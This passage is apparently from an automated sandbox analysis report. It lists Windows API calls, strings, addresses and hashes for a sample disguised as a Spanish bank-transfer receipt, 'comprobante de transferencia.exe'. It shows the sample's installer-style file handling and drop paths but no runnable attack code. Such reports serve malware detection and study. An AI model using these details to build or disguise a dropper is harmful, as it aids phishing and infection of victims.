                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BE8
                                            • DeleteObject.GDI32(00000000), ref: 00404BEB
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D26
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D34
                                            • ShowWindow.USER32(?,00000005), ref: 00404D45
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EBC
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE0
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                            • GlobalFree.KERNEL32(?), ref: 00404F25
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                            • InvalidateRect.USER32(?,00000000,?), ref: 00405076
                                            • ShowWindow.USER32(?,00000000), ref: 004050C4
                                            • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                            • ShowWindow.USER32(00000000), ref: 004050D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                            • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                            • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                            • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                            • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                            • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                            • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                            • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                              • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                              • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                              • Part of subcall function 004062AE: CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                            • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                              • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                              • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                              • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$|w$&B
                                            • API String ID: 2624150263-1778747185
                                            • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                            • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                            • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                            • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2927007333.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926984123.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927043710.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.2927075558.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$Free$lstrcpy$Alloc
                                            • String ID:
                                            • API String ID: 4227406936-0
                                            • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                            • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CoCreateInstance.OLE32(004074E4,?,?,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven, xrefs: 00402154
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven
                                            • API String ID: 542301482-828510313
                                            • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                            • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                            • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                            • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404319
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040434A
                                            • GetSysColor.USER32(?), ref: 0040435B
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                            • lstrlenW.KERNEL32(?), ref: 0040437C
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                            • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                            • SendMessageW.USER32(00000000), ref: 004043FE
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                            • SetCursor.USER32(00000000), ref: 0040447D
                                            • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 00404492
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                            • SetCursor.USER32(00000000), ref: 004044A1
                                            • SendMessageW.USER32(00000111,?,00000000), ref: 004044D0
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: Call$N$open$|w
                                            • API String ID: 3615053054-2179926920
                                            • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                            • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                            • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                            • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                            • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                            • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                            • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
                                            • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                              • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                              • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                            • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                            • wsprintfA.USER32 ref: 00405DC0
                                            • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                            • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                            • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                              • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\comprobante de transferencia.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405BF3
                                              • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403500,?), ref: 00405C15
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                            • String ID: %ls=%ls$NUL$[Rename]
                                            • API String ID: 222337774-899692902
                                            • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                            • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                            • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                            • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                            • CharNextW.USER32(?,00000000,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                            • CharPrevW.USER32(?,?,76BF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\comprobante de transferencia.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                            • "C:\Users\user\Desktop\comprobante de transferencia.exe", xrefs: 004062AE
                                            • *?|<>/":, xrefs: 00406300
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\comprobante de transferencia.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-171013888
                                            • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                            • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                            • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                            • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                            • GetSysColor.USER32(00000000), ref: 0040417E
                                            • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                            • SetBkMode.GDI32(?,?), ref: 00404196
                                            • GetSysColor.USER32(?), ref: 004041A9
                                            • SetBkColor.GDI32(?,?), ref: 004041B9
                                            • DeleteObject.GDI32(?), ref: 004041D3
                                            • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918586921.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                            • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                            • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                            • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                            • GetMessagePos.USER32 ref: 00404A66
                                            • ScreenToClient.USER32(?,?), ref: 00404A80
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2918242072.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2918207038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918272378.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2918317560.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
